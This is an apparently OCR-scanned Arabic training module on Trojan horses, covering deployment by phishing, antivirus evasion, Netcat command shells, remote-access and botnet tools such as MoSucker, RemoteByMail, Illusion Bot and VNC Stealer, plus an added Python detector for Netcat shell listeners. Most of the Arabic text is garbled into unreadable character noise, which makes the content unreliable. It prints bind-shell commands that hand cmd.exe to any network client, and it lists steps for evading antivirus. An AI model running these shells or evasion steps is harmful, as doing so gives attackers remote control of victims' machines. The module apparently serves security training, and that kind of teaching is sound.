I^J LaJ ^atjiJl (J^^A 3 (JC- Jlfltill (Jjxjujjll 4jilla j pliiaj ^JJ ^j) ^Tjn 

Start -> Settings -> Control Panel -> System -> Device Manager -> CDROM Properties -> Settings

Browser and Email Software Bugs

Aiajj jl iJaa^j ^jj^ Ljtfllj* jl^JI l-jjj aj lLuj^ j>» Jj SjLij i^Lujj jjj^j>^j ^—^j^j (j -0 jl^-^l (jl l!^^ ^j^*-^^ 
.4ijj«^3l J^LUI ^ j^VI jA\ L p a *j jl Outlook Express Jjj^V^ ^j^^ c> ^ j^j^^^ jt 

JtJJJ JjjJ^lVI ^^>^^ 1 (j-Q 4 a i dj^.! ^CjliajxJl (Jjjft^J (JJ^ C5^" LL^axi (jj^3 t — * ~ I^JLuiaSI ^Uaj 4^j^.l Dj-d 

_C_jIjI^j^V1 6^A J^ajk ^j-d JlL <iV t^a^JjoaJ (jl 

;Cjlinlajll ^ ^p£3! jl^aVI ^l^klojl tjnnj t^lli J£ 'BUGS 6 ^ ftjjjrs ^il ^Sl jJI 

http://www.guninski.com/browsers.html
http://www.guninski.com/netscape.html
Fake Programs
J!* djl jjiAxJI l^liAaj ^jj ciiia 4<jL^.LiL^.V <jjuj\_L<i ^^jII A-ijl a A\ Jj-^jI 4_i^jJaJI s-ljc-j aS >>n ^ ^ &-j a^I g a!1 

^jj _4^^jjab<JI d^j^JI ijp. * ^.njj (Jjuaij AjI &aJI Jjjli j>» J^iilaj U jmjj ^c^l^JI Jj^aaj ^jIj Aja uall 

JjajjJ ^j) Liajl (j£-aJj .^.1 Ja^^Ll ^jl (jj^ (j-G ^Ig-xJl ^J^)J (jj.Vu ^ S^jujU-o POP3 ',^'^1 JJ^>^ ^ A ^ J JJ^V^ ^L>^ cJ^jj 

.^Ig-xJl IgJb njjj SjSl jll CjLg jIslaII £-<^ J& L_fl^Jl .^JjlLJl djbjjJa j A^^unl\ JjuJI t - \\ <iK 

t^J) ^1^3! ill JL^j^U ^Vimi jSai <POP3 -Si 110 ji 25 fhviJj jj&WI ^ 

Sj^il! .Ajjl a all £L-al^)Jl 4_ix»jJaxJl 4_iik-<Jl 1 ^ jll ^a^JjaaJj <Jj^lJ (^£^kl Jjjlkl Aj\ (JA (j^J '<J-^ A "."^ 4<J^ixJl 

.MP3 pUa&l 6 jU& ^ill j tfake audio galaxy ^ .^^V ujA^ 

^aJJ ttilli AiLjaVlj .MP3 cAiJjj! ^jJa jl 4^UaJ LlijljlijC. 15 <^Lulo ^l^klujU ^1 <JLa Uijj ^.l^xJI 

(Jj^aalLj qjajLi jJ^iiill (jj^Vlm^l ^l^k] tilli ^I^JjojI ^aJJ L— Lia -( J£joJ| (Jjoij ^^Jc Uiajl l£^>^^ ^ ^h^VI (J^axJ (JJj^J 

(jjil! ^i^iLuJI ^Ld^jjaixJI l t \y *aj L_a jjujj backdoor ^ 2^^^>^^ cJ-^ .i^JuJI u^^^ (JjjUII ^£> 

.ADSL cj^-^aj jj^ ^kiaij 

^^kiaix» ^1 ^^kj jl jSaj liA j .setup readme.txt ^ Vu* > ? ^ & -W^ u^ ^^ > 

Shrink-Wrapped Software

.s^ijjL ijji^ (jl o;^!^ u^ 1 ^^ ^> l^mxj Legitimate "shrink-wrapped" software 

Via Attachments

<j^aLk3 ) Sj^VI jia^JI qj± (j* & ^jj l^il diia. t(exe <-ii^) Jj*j^ 

,aA\ jM\ oj± c> «£Ai ji^J! " Microsoft IE Update" ^ ^ ^ jj^V 1 ^ d** J - 

_Uj1I1j iaa^JI CjULJI iiiiL ^ j£i ^jSI ^Ik^VI I^j^I 'Outlook Express jj^V^ ^j^^ 

Untrusted Sites and Freeware Software
qa (g\ Jx^j SjjIaaJt Q*i .cjU^jJI NeuroticKat {underground sites) ^SIjJI <> c*]Ua

_jj j^-^- J^ ^Ij^ 3 * g 13 SUS AjIILaj (Jj^j (jl o^-^ Jli j^uiaII ^3 j>JI (JiLa Jc ^ij ^j]| CjIj^VI jl ^alj^JI 

cj^l^jj feedback <J^-^ l£ £*l j*^ 1 u l fl^ji Jc- ^ j^-ij 4_}il j^l * J^ J^ £^ j - *^ 

(JLijI£ lit La AjA^ ^n^j tl^Jj^jj <Jji CAiLJl aifc (j^a^Al J^-^ (jj<OVim^l Jc ( . lau .(_£^>^J 4 jj» uj £al ^ Jl 

.4Jfc jiAo jl 4 jqj'q^ £fj (j-a jb (jSj a! j\ 
4Jaiij-<J! ^1 j>Jl jl) Jj^VI £-3 ^<JI (j-a IgJ-LaaJ LJLaJ (_£^)^J 4 JJ» >* 6 PGP 'ICQ 'UllRC L&-° daLi^ 

.^juiij £L^U^)Jl "^JJ J^ J-*^ ^ J^ C£^>^^ £^ J* L>^ L>^ L>^J ' fi^^^ 

1 ■ lao 4^Lx»l^)i3l" 4_L^jl3l ClAjLnJaJ t fltla a £xa AjljujIj CjUa jQ^ a ^£J^3 (jjillj cAij^stxJl (jx»VI jj^a (j^alaJl £§1 ^<Jl L-jLau^a) 
£c-gI^)Jj CjLujjjjiill *Lail^a ClAiLulaJ ^I^JjojU (jLa^VI (j* J ^ g - < . ^ Jj 1 g * ^ jJl CjliUl ^jc ^Jjjjoi^ (jj^J (jl 

^\ ^ A\ ^jti <!L^. ^ (jaJ ^ j-^l (jc JjjjoixJI ^jl£ lili Lj^jVI ^1 ^UDP flooder 'J^>JI J^f^ 

_(jL^. j^)J ^ ^3 ^<Jl (^^Jc djliLa ^jJa ^3 (jC (J jjjoiaII 4_iljjjaixi!>l!l (j-G ^jqlun L_fl jjoj 
(_^l (jC L_Lua^3l Cj^. lil .l^JJ ^frlaJail (J^a^3 ^JJjll CjlflJiJaJ jl ^xil^)i3l ^ jj (_^l ^ (jjLdlxJJ (jjill (jJ-d^JjauJl ^^^ic c . La>J 
(jxi ^ q> f >i^ll Cjljn^ ^ ^1 CjUai JL^j (jl c . ia>j Ajli ala J oUloil (_^l Lou lil ,til3i (j^a^B t . t^j^. c aL> 

NetBIOS (File Sharing)

^nnl j t^Uaill <J jj^ jll (jj^kVI (J^ (j^ ^-^1 ^"1 (j^-^ tdjlilxJl A£jLaui (jj^ <LJ ^aJJ 4(^1 6^ J^-« ^aUaill ^^Jc 139 ^-^1 (j^ lij 

.^UajJI ^ c^LJI Jja*j j ttrojan.exe 

^Jc. <juoij (JjxjujJ o^lcl (j^J 6^lj^)ia (jli ^UlUj tjjjir.uull D^lcl (jiajSj ^aUaill cJ^*-^ ^ DOS r* a I iklLujI Uiajl a^I g aI] (j^J 

ijl JSSjI 6 Windows ^^-^ jl^ 3 ) ^^Jl a£jU^ ^iA . jjall 
Start -> Settings -> Control Panel -> Network -> File and Print Sharing

Downloading 

,6jJaa. (jj^i (jl (jlx»j dujijVI ^1^ c>» screensaver j 6c_jIxJVI j tCjULJI Jjjii 



How to Deploy a Trojan

46^1 J^a ^a^lA Lullj g ^11 t^ji^jJall jl^a. ^^-Sc Sjj-ijuill <J^.I (j-d ^A-l^jJall ^aUaj <J jj^ jll (j-d ^.1^>JI (j£-ftJ ^^l ^ilwJ jll (jL^. JJ^I 

(jxi (J^jl -^^^ 4-f^^l (j^ ^^>^^ JJ^ iajlj Jc (_£ jl^J <;l^jJa3l Jl Ajj JJ^J] ^-SIjuJJ J^J^ ^ 

AjIj^I 66^1 Jjb C-UJJJJ ^ajlj - < r l^jJa3l ^aUail 6^1 J^la cJ^J^ ^Ij^ 3 .*^l J^la ^L^. £A 6^)jujUx -laJJjJ 6^.1^31 

(illxij ^1 g aSI (jli ^ ^^^-^ ^i^J^ajl -iaJJ ^^>?^ ^^J^ f J?^^ ^l^. Jl 4_i^jJa3l J^j^ jJ ^JJ ttillil 4 .A-ia - ^aJI 

;^ljjuj 4)\aC* jl CljjljVI AiL^a ^l^U - bJI ^ala lil .a^I g aSI ojU^J ^1^)^.1 c^l ^J^.J AjawJalt alJaj Jc <Lal£ll 6^)IaJjaJl 

uj <jujL II CjLq jlx^ll <3^)juj 4 j£ <Lj g aII (jli 
B (_£jaJ 4 AiaJl Jc^ dil (j^l J v - 4_i^jJa3l <!l a I iklLujI LJajl (j^J 

Jc D^!j^)!a (jL^a^. dlJJJ (^•iil ^jj^)J^I (_3^^>^ ^3 jl AJAA^ A L ^ij Jc^ (j^^aJLab<Jl Ja (jC jjU^ll 6^_^l L-jL 6^lc 

.(JiSald JJ^I (J^jV jfi JJJ^^I ^lAaajoal tilli Asu j£ <Lj (jjill (j^ J> bllCkdOOr '^-^aj ^^1 a^j 4_j^LaJl jj jjj^ll S^aJ 
[Figure: Trojan deployment. The attacker installs the Trojan on a Trojan server (Russia) and sends the victim an email containing a link, dressed up as an Apple Store message; the victim clicks the link and immediately connects to the Trojan server; the Trojan is sent to the victim, infects the machine and connects back to the attacker's server. Major Trojan attack paths: user clicks on the malicious link; user opens malicious email attachments.]

Evading Antivirus Techniques

;cjLuj jj^I * M^-^ worms j j jj^ ^ dAkiLujj ^^ill cjU^IH c qVi^ ^ ^Jj Uua 

<j^jj^ -3 

Convert an EXE to VB script 
Convert an EXE to a DOC file 
Convert an EXE to a PPT file 

.checksum -4 
.hex editor ^l^i^U ^IjjL -5 
Types of Trojans (6.3)



/ alia all (JjLoj jl\ <jujL II CjLg ^Ll>JI ^^-Sc (J jj^a^Jl (J^J (jj^T^ g a\\ (Jj3 (j-a lg_x»l,lkjjuil ^aJJ ^J^ 3 

'email Trojans 'document Trojans < command-shell Trojans fal jj^ ^ ^1 jjl ^) Iaa ^kij 

^kj tproxy server Trojans <botnet Trojans 




ciiijjj ^ . AjauJal l jl^ ^ (command shell) j*l jVl <9jis3 a*j ^ ^i^il! gr k*j Command shell Trojan 
^l^JI ^ Trojan client ^ .o^W^ JL^V iii* ^illj t3 j^ > ^ l ^ (Trojan server) s^ljjL 

jW (command shell) j*l jVl J^-^ ^ v^ .. n ^ill j 
Command Shell Trojan: Netcat

j*Vl liA ^ .DOS shell J] telnet lU^? <J M-^ 1 t> ls^'j Backdoor J ^\ 'Netcat 

pL^j ^ ^1, , )^ jLqj 'Netcat .5000 -^j^ u' <^W^ <[C:\>nc -L -p 5000 -t -e cmd.exe] -W^t 
^reverse J forward *l lU^W DNS o-^ ^ c?' t> J J) <UDP jl TCP j^l^JI ji jl jll cjVL^VI 
(Source address) u'j^ c£' 6 C5^> j^a>» iaia c$i ^ hvim l s j^ll jajj <li tt^li Jl iaLjaVU .ajjojUJI CjI jjI^jII 
L^ja a (source routing) j^^^ ^^-^1 iat_L<JI Cjlj^a ^ C5-^ ^ * IaIjI^cI 

diVU^ajVI Jc ^j3Lj ^UjJ ^-LuJI Jc ftj^Slt .(stdin)^^-^ dl^VI jYI jia^ Cj^^U^ s^lja 4 £ ajj 

.Sjjl jll 

Jl uAjflll Jlk^YI J^Jjj ^JJ ^3 t LljJa^ll C5 lc Qpu* iilo Jl TCP (J 1 ^ *Luijlj ^»jl} "nC hOSt port" t^l^Lual kjudJl 

.A-jjujUill dL^tkAxJl Jc c aLall ^xj ^ jj^Jl j ^c^ 1 jll t^j^YI CjULulaSlI «>h» a (jc c allkj c*] jLJl liA , jL^ajYI A^f^j 

Jxij ^ j t (arbitrary ports) ialiJI Jc^ s^jl jll dYt^^U ^UiuiYI 3_Aiaj Ljajl Ja*j jl Netcat 

UUi cjUUJI cilj^j JI jj V < J^*JI jf ^UJI ^-^a j ^ J-^ ^ c^W^ ^ Netcat ^K. 1 " 1 .^ ^ t° j ^IjSlI 

c> J 'UDP jt TCP jll jl SjjL^JI CjVU^jVI ^UjI - 
.^UJI cjIjjI^jII ^ 4 reverse J forward DNS 

UL^ l^jj^i ^ ^1 (Network Source address) j^^JI jlj^. ^1 ^l^k^l tySiS 
.(randomizer)^ <^^JI ^U^ll L >^ai s j^ll 

a^aJI (source routing) a^jj 

N ^Ij ^Slow-Send ^jll 
jl jllj ><JI Hex dump 

iii^ll ja 23 [nc -l -p 23 -t -e cmd.exe] j*Vl responder telnet-options ^j^VI Sj^ill
^1 duiil] cjLjajlLi <j| ^ J^Uffl Netcat (-t) j^^^ * \:° v; ^ j& (-e)j^^l ^Loi^iU [-1] jU^JIj telnet J 

jt TCP ^ e^ 1 ^ jCh-jJ > .UDP jTCP ^V>jjjjj ^1 cjI^JI j u\JL slJ ^ Netcat 

.^Uaill jjc J jj^a jll l_lo£ ^ i£ .qj telnet s^Loiaj ^jJLolLJI j l^^JI ^Uaill C5 Jc UDP 



[Screenshot: Command Prompt showing the Netcat usage text ("connect to somewhere: nc [-options] hostname port[s] [ports] ...", "listen for inbound: nc -l -p port [options] [hostname] [port]") and its option list (-d detach from console, -e prog to exec, -g/-G source routing, -h help, -i interval, -L listen harder / re-listen on socket close, -n numeric-only IP addresses, -o hex dump, -p local port, -r randomize ports, -z zero-I/O mode)]
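The listener commands above (nc -L -p 5000 -t -e cmd.exe and nc -l -p 23 -t -e cmd.exe) leave two host-side traces a defender can look for: a Netcat process whose command line hands a shell to whoever connects, and a shell process whose parent is that Netcat. The following is an added example, not code from the original module; it runs that check over a constructed process inventory and socket table (the Proc/Sock records and every pid are made up) instead of querying a live host.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}
SHELL_NAMES = {"cmd.exe", "cmd", "command.com", "powershell.exe", "pwsh.exe", "sh", "bash", "zsh", "ksh"}
VALUE_OPTS = set("ecpgGiows")   # Netcat options that take a value (for expanding -lvp 4444, -p5000)


@dataclass
class Proc:           # one row of a process inventory (constructed for this example)
    pid: int
    ppid: int
    cmdline: str


@dataclass
class Sock:           # one row of a socket table, as netstat -ano would print it (constructed)
    pid: int
    proto: str        # "tcp" or "udp"
    local_port: int
    state: str        # "LISTENING", "ESTABLISHED", ... (empty for UDP)


def basename(path: str) -> str:
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def expand_flags(argv: List[str]) -> List[str]:
    """Split clustered single-letter flags (-lvp, -p5000) into separate tokens."""
    out = []
    for tok in argv:
        if tok.startswith("-") and not tok.startswith("--") and len(tok) > 2:
            letters = tok[1:]
            for i, ch in enumerate(letters):
                out.append("-" + ch)
                if ch in VALUE_OPTS:           # the rest of the token is this flag's value
                    if letters[i + 1:]:
                        out.append(letters[i + 1:])
                    break
        else:
            out.append(tok)
    return out


def parse_netcat(cmdline: str) -> Optional[Dict]:
    """Describe a Netcat invocation; None if the image is not a Netcat variant."""
    argv = cmdline.split()
    if not argv or basename(argv[0]) not in NETCAT_NAMES:
        return None
    info = {"listen": False, "persistent": False, "exec": None, "port": None}
    argv, i = expand_flags(argv), 1
    while i < len(argv):
        a, nxt = argv[i], (argv[i + 1] if i + 1 < len(argv) else None)
        if a == "-l":
            info["listen"] = True
        elif a == "-L":                       # Windows build: keep listening after each client drops
            info["listen"] = info["persistent"] = True
        elif a in ("-e", "-c") and nxt:       # program handed to whoever connects
            info["exec"], i = nxt, i + 1
        elif a == "-p" and nxt and nxt.isdigit():
            info["port"], i = int(nxt), i + 1
        i += 1
    return info


def find_shell_backdoors(procs: List[Proc], socks: List[Sock]) -> List[Dict]:
    """Flag Netcat processes that hand a shell to the network, and the shells they spawned."""
    by_pid = {p.pid: p for p in procs}
    bound: Dict[int, set] = {}
    for s in socks:
        if s.proto == "udp" or s.state.upper() in ("LISTEN", "LISTENING"):
            bound.setdefault(s.pid, set()).add(s.local_port)
    findings = []
    for p in procs:
        info = parse_netcat(p.cmdline)
        if info and info["exec"] and basename(info["exec"]) in SHELL_NAMES:
            reasons = ["netcat runs %s for whoever connects" % basename(info["exec"])]
            if not info["listen"]:
                reasons.append("reverse shell: connects out to the remote end")
            else:
                reasons.append("bind shell" + (", re-listens after disconnect (-L)" if info["persistent"] else ""))
                if info["port"] in bound.get(p.pid, set()):
                    reasons.append("port %d is bound by this process" % info["port"])
            findings.append({"pid": p.pid, "reasons": reasons})
            continue
        # A shell whose parent is such a Netcat process is the live backdoor session itself.
        parent = by_pid.get(p.ppid)
        pinfo = parse_netcat(parent.cmdline) if parent else None
        if pinfo and pinfo["exec"] and p.cmdline.split() and basename(p.cmdline.split()[0]) in SHELL_NAMES:
            findings.append({"pid": p.pid, "reasons": ["shell spawned by netcat pid %d" % parent.pid]})
    return findings


# Constructed inventory: the module's persistent bind shell on 5000, its cmd.exe child, a Netcat
# used as a plain client, and an unrelated process. All pids are made up.
PROCS = [
    Proc(1320, 600, r"C:\Tools\nc.exe -L -p 5000 -t -e cmd.exe"),
    Proc(1500, 1320, "cmd.exe"),
    Proc(2000, 600, "nc.exe 10.0.0.5 80"),
    Proc(2100, 600, r"C:\Windows\explorer.exe"),
]
SOCKS = [Sock(1320, "tcp", 5000, "LISTENING"), Sock(2000, "tcp", 49152, "ESTABLISHED")]
```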
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Gui Trojan: MoSucker 



Source: http://dark-e.com

jlkkj opuj ^jaJI j^u ^jjj MoSucker's edit server program .Visual Basic Trojan j*> MoSucker 
4%*^ Mosucker '<j ch> jjj .(jJ^^J jV j system.ini yi lU^ Mosucker 

_Jaaa LjLJI ojjj^kll <JjLoij3! jjc <U A\ L_aj| j^JI j^^j a ^ *j j^^- ^ J-^^ C5-^ <LjIa3l jLilkV 
.(Sj* J£ ^ jt £^13 ^ Ul X) c> X ^ Jj^^Ji <^ MoSucker f s edit server program 

i^VtS ^ Mosucker & ^u^t LL^I j 
(Zip file is damaged, truncated, or has been changed since it was created. If you downloaded this file, try downloading again)

;^LaJI fuJ jjJii ^1 j MoSucker *UjuL ^UjV 
(MSNETCFG.exe, unino686.exe, Calc.exe, HTTP.exe, MSWINUPD.exe, Ars.exe, NETUPDATE.exe, and Register.exe)

.Clipboard Sjbl 

^uji AJiji/ci^j - 

(Crash System File Manager) fUadl ^ Sjbl 
(Taskbar)^W^ -^j^ 1 ' system tray < (Start Button)^M jj jW^j/^^j 

- 

CD-ROM j " 
ping ^Lk - 
Pop-up start menu 
(process manager) ^Ul^ j^ 
j^j^ ^ ^UJI Logoff /standby/ J^ftll SjIcI/^JiISjJ 

(Window manager) ^alj^l 



[Screenshot: MoSucker edit server dialog with a Server name field and a list of file extensions (exe, bat, scr, com, ...)]
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GUI Trojan: Jumper and Biodox 



^vimj (jjd^l g <M .dijjljyi <luaJl ojLjall (Jaa^j] ^jAxJI ^in j SjLja j Jumper 

4_jaLjal Cj^^ii Jj^^L Uiajl ^jIj a laJLuiAll ^Uaj AJLJI CjU» jIslaII J!Lo <jujL 11 ciAiUJ! ^^Ic <J ^ai] Jumper Trojan 



^ I ^ UA^ jj^ ^ lij *C:\Windows\System32 ^> ^ BIODOX OE Edition.exe ^1*11 uj^ u> <\+**> 




<±a^a] | L^Saj ^ *^ljj]a j ^ajj ojaJu s^lc j^a^I^I . (Document Trojan)*-*£jft u^ 1 ^ ' "uffi 

CjUL j j£5la lajLuj jll CjUL jl diUij^a 6 (office documents)^^^ j 6 cP jj-^V^ ^j^' JjI^j <Ja Sjj^ 

,6jLja cjUI^^.] Aiali j 4_jajLud^JI djUUJl jll (jj^^l ^ m S\\\w^\ ^iil ^a^LolaII (jfeulalll exploit 



[Figure: a fake FedEx shipment notice dated September 2, 2012 (a letter asking the recipient to pay customs duty on an Apple iMac 24" computer) used as a lure; the Trojan is embedded in the Word document. Attacker embeds Trojan into a Word document and infects the victim computer; the Trojan is executed as the victim opens the document and clicks on the Trojan package]
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Email Trojans 



giL ^vim^ l f\A kh^l .cjlia jA\ J!^k ^^jj^ J-^ jj ^ .bulk emails e&J^ CP Email Trojans 

^3 jj Email Trojans u^^^ o^*^ ^-luulU (jjajj*^ jj*jM .^i ^ <L<»,jli3l ^jjjSJVI ^o^t cJ^-^j I j^j^ 

_Ujtfllj CjUuIxjI! .Jjijj ^JJ i o t^jjl&lVI ^O^t 4_iauJa3! ^j£j La,jjc. -( ^jjjj^3yi ^O^t <J^-^ L>^ 1 ^ dil ajWl JLojjU (J^gjIj ^jj^^l g a\\ 

>C5 jjjj^3V1 ^o^t cS^^ 3 j^j*^ cJ^j] lS^^A 3 CP ^ <*— i^i^ll ^tajlai! ^ ^ia^I^J! (j£-aj t^UlUj 

.Email Trojans ^l^l^W ^ 2^J^ 



[Figure: Email Trojan flow: the attacker's instructions are sent to the victim through emails across the Internet firewall; the Trojan on the victim asks "Any commands for me?" and answers "Here is the requested file"]



Email Trojans: RemoteByMail 

*l}JjJl (jLoijj (jjjjla A i mAJ tilli j-a ^jc jlajll (_pasu ; jj jJAa^II j^g-?" C5^1 J J 



3J \\ j sjkjjl RemoteByMail 



JjJjolJ 

.cjliLJI ^2fl j! ;^jjjj*U3l djliLdj ^iljJI ^jijj ^^Jc Jic-Luaj 

.cjUUxJIj ^jjjUV! ^jjj3! ^ <jW RemoteByMail ^ Start Server ^j^^ ci> j^ 1 :Start Server 

.^j ^i^ a:i3, Stop '^J4 c3> j^ 1 :Stop 
.^U jA\ cjU jkx» j^ : Check now 
cPjj^V^ ^J^^ ols^j ^ :Listening to Accounts 

.^UjJI UliiL ^1 j^ljVl ^ c^j^ cr^^ cPjj^V^ o^^s : Emails received 

jVI ^ ^jj ^ o^j ^j^l j^'jVI o^j*i :Command queue 

.<jJUJI ^jjjjUVI ^jjJI JjL-j o-a^i :Outgoing emails 
.RemoteByMail c> W^-j^ ^ ^ lPjj^V ^j^^ Jj^j lP 3 ^ :Emails send 

:aJU3! j^I jVl iijjj l^j RemoteByMail 
.ciL o^UJ! ^jj^V 1 u 1 J\ "HI" c5 j^JI ^ yHJJ^ J u jV e^ 1>n1 :H I 
,t*L o-aUJI jj^IV^ u ( J] ( *<j>^t jj ^ *^ ja. cjUIJI Jjojjj :SEND 
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£tji3 .t*L (j^aliJl ^jjJ^lVI ^JjJl (J I J^C Jj t *auU^l jj jjja^l Jc oA Ch\ lla all j) CjULJI JIujjI <jaj ^» - gaJ ^ajflJ ;ZEND 

.L-Lud^JI pLuljj Aic l^jjlkl Jll jj^Ji <Ja^l tAjali Asu Ja jt > ^i^ll ^a^JI 
.( LjjaJI jj Jc jBLII CjUL ji jJ! ijiiL fjL :EXECUTE 
.tSL (j-aUJI ^jjj^IVI .ijjJI (Jj ^ N V o^jSVl J^jj :DIR 




Defacement Trojans 



.cjUUJI s^c-IS J *^ j*J! ^ jl^l jjj>j jl j^aj ^Uajl! Jc; 6 jj^j j ^Defacement Trojans 

jjjudii J Ja joijj ^jL <il dii^ jjL^l^ll cJI^IojI ^jc. s jjias. jl^jj^l j3£i Defacement Trojans 

c_jjj3I ^ J cjI jj^ ^^jj ^l^b HTML 
jjUjjxi Jj jSII < compiled Windows^ i> 4-^^ c£' i> ^ j^j^ j lP 3 j*^ ^ ^ JJ-^V^ 

(logo) <«— j 4_iLki3l jjj^IIj tAjj^ill J-*^ liLujij ;^-|jaJLuj| 4 jjj^j t^jlajsu (ill ^ajujJ ^Jjjj^aII ^jl j-g .CjUjjVI Jj jl 

Jli* . JjaLj cjllnki 4jj^i3 target-styled Custom Applications (UCAs) M . Jj^j g^j* t> ^AAV'j 

: JVI£ U dii^. calc.exe 



[Screenshot: Windows Calculator (calc.exe)]
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Defacement Trojans: Restorator 

Source: http://www.bome.com

<-^l «j ^ .WIN32 jj^j 5^ JUxIojVI skin editor Restorator 

o^jc <A&*i .^l^ll c> ck^ 3 c^target-styled Custom Applications (UCAs)^l J^hj ^ 32 j>%9 

6 [.ocx (Active X)] Jtlall J^f^ tdjULJI ^Ijji ^ ^jAxJI jjl ^^ic* JjAxjIL till ^xujjj <uli t^iiill aj^UII 
Jilaui ^cxiUjj .Sjjij^all MhuW dAiLall ^^ic Cj!>Ijaxj3I ^jjjj ^ tl£^ .CjliLJI ^j^- j 6 [.scr (Screen Saver)] 
dilaU! ^ jj| jj( jbjluib till ^-.alhj (Grab function) 4lJa j .^1 jJI dik^l ^311 c^jAxjJI ^jII j ajIIj 

.t_fl^JI jill C5 lc- 

^illj (jjilajll 1 ^jIc Axusu c ^jJI CjULiJI c _^a jjt ^11) ^jl ^11 ^5-lc JjaxjIU till ^-<ujjj ^illj boom ^j^l £\ jll ^ii<JI Restorator 

^jljJI . jjjkillj t ^j^flSl l i j^aa^l l 4c_jj^jll/4^jil tiA ^l^ki^l tdjSxj .(.dcr) j (.rc) '(.res) ^(.dll) <(.exe) 
& jia^ll j jc- jUI/cjI jU^II Jl^il tilj^j ^Jill j .intuitive target-interface <^ j yr^ ^ (resource editor) 



[Screenshot: Restorator (trial) showing a resource tree (String, Icon, RCData), an options dialog (show tooltips, allow multiple instances, show splash screen, keep window always on top, ask for folder when assigning/extracting, number of recently used files) and a string table of runtime error messages (Integer overflow, Invalid floating point operation, Floating point division by zero, Floating point overflow, Floating point underflow)]



j^Aj 4jJ* ^ r43 (Backdoor 'Trojan 'worms) software robots i> c> yr* Botnet 

SjUall <jlaall ^LnJI j (Conimon commands) jVl Sjia^ ci^j ^1 jJI Ja iLu jjj ^ j£s ^1 j a£j!L^J! CjVI ^ 

* ^-fl^VI .axj jo lJI^VI t> ao ^ ^jII -u^j (^l^li) Botnet .(Control Infrastructure) 
L5 1jLj^\j s^ljjla <i^*J ji worms m ( (zombie computer) ^ j^j^^l^ c> ^>^^) j^j^f*^ 

jUjaJ! cjIa^a (j^-la) jl tdjLoj jj^ll <>(spam email)^y^ J^jV ^^f^l^ r 3 ^^ J u^-W^ ci^ ^1^ 

^l^klojU ^jjLA^lg-All ^1 JjS ajIc ^^blajVI j I^SjIjuq j duj ^1 jj jjU^ill oj$a.I ^ .(denial of service s)^^\ 
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<JiLa CjIa^JI ^Botnet 6^cLui^ ^» /^^^ ^ Ia j^c-j iAjj^-uitJIj j^aJlj 4_ixu1xj3I cjI^jjoJI ^jja^jjoij Lq a^lc Botnet I 




[Figure: Botnet topologies: Botmaster; Hierarchical; Multi Server; Star; Random (Mesh)]

Botnet Trojan: Illusion Bot and NetBot Attacker 

lili (JjxjuHll ^aUaj (j-a (jSa JJ 4il£ tJ-oxJl J lAlJ LoAic _ jl^C-VI J A^klLaaJ A^uJal j 4-1* jjujj 4-£^J J Cjli aLI Illusion Bot 

diijjj Jl J&l Bot t> cjUUxJI Register Service Process API ^ <WIN98 ^ 

.Explorer.exe ^ 3 >^KN ^1 j^Vl J jU^j -uli ^"n/nll ajLc; cAJik lij .rootkit ^-^ji^ 

- C&C can be managed over IRC and HTTP
- Proxy functionality (Socks4, Socks5)
- FTP service
- MD5 support for passwords
- Rootkit
- Code injection
- Colored IRC messages
- XP SP2 Firewall bypass
- DDOS capabilities

^jj <iV .cjU^JI s^IJ j 4a£jj^3I a jbjj jjjla^l ^j^j j ^botnet * j Kj m1 ^ ^j >> i j jj^j j NetBot Attacker 
.EXEj (lP^^j J-^*-* ^3^- j^j 6 j^^) INI t .ufo ^ f RAR L 1^ ^-W^ ^Uaill Jc 

.Botnet ^ c> U Ja. ^ j^t ^ ^ JM * j^W sbVl oi* ^backdoor j* J^Vl NetBot Attacker 
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■is^jjt uj^ ^Uajll J*^ (j'^j c> J* Proxy server Trojan 

£ &1] 1 Sail jj jjUx^ll ^^ic ^^jud^j^j ^\a/^L» pli^jj Ia^j ^jj ^jc 'Proxy server Trojan 




[Figure: Attacker connecting through the Victim (Proxied)]



Proxy Server Trojans: W3bPrOxy Tr0j4nCr34t0r (Funny Name) 
jVL-3VI ^ axj ^ e U^I J! J^jll ^ ^1 .jjjki ^ Proxy server Trojan j* W3bPrOxy Tr0j4nCr34t0r 




W3bPr0xy Tr0j4n is a proxy server Trojan which supports multiple connections from many clients and reports the IP and ports to the mail of the Trojan owner.
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g A\ JjS <J jll cJ^-^ t '^'"^ ^Uail! cJ^j 21 diA^j^a cs-^j ^j^ 3 a * u jj! ^ jj FTP Trojan 

Lu> tcJ^jjouJl jl^aJl FTP <jV 




[Figure: Hacker connecting to the Victim over FTP]



FTP Trojan: TinyFTPD 




[Screenshot: TinyFTPD v1.4 started from the Command Prompt: control port 21, bind port 55555, user test / password test, home directory c:\win98, allowed IP and local address set, read/write/list/create/delete/execute/unlock/anonymous access flags, "Time Out Thread Created Successfully", "Waiting For New Connection", and an FTP client listing the root of C:\]



VNC Trojans



^ £>i& 6^1 Jjia <l^a^.l (jC t Lu£H ^aJJ <jl . VNC^^ ^J^^-^ <— JJJ*^ ^al^klajV ^jaa^I^aII ^jujJ VNC TFOjailS 

•^UaUl l-u^j U.b£< ^t^-ail ^ Jjj 

.ojjU^II ^ ^iliJ! ^ JxixJI (VNC daemon) VNC ^ - 
"secret" >Jt <-cJS ^ VNC viewer c> c?' fl^^j <-^l 



[Figure: VNC Trojan: command and control instructions and VNC traffic between the attacker, the Victim and the VNC Server]

https://www.facebook.com/tibea2004



VNC Trojans: WinVNC and VNC Stealer 

.VNC Trojan e 1 ^ <> OP* VNC Stealer j WinVNC 

WinVNC - 

<jjj^ta (jji^ig-All q\ ciii^. •^•^iJl ^aj ciii^j Widows ^ ^5^* ^jK^ u1 ^ o^j^ <J j^aail ^^ikiLaLj WinVNC 

VNC Stealer - 

: JUi ^IjU! *bV VNC.EXE ^ .Visual Basic VNC Stealer 

.software packing process fl^i^ U J/j l^mxj <WJ1 
.ijiaVl £il jj^^j ^IkkVl 4 JjU* jll < system tray pop-ups 
. (system registry)^^ CjUuJI < 

(process hijacking) Process's Virtual Memory - 

Jja^s j| ^Uaill ^ ft yr^ j CjLLc ^ process hooks code £ j jj ? j*t 

.Dynamic Link Library File 



[Screenshot: WinVNC "Current User Properties" dialog (Accept Socket Connections, Accept CORBA Connections, Disable Remote Keyboard & Pointer, Disable Local Keyboard & Pointer; update handling: Poll Full Screen, Poll Foreground Window, Poll Window Under Cursor, Poll On Event Only) and the VNC Stealer interface]



HTTP/HTTPS Trojans 



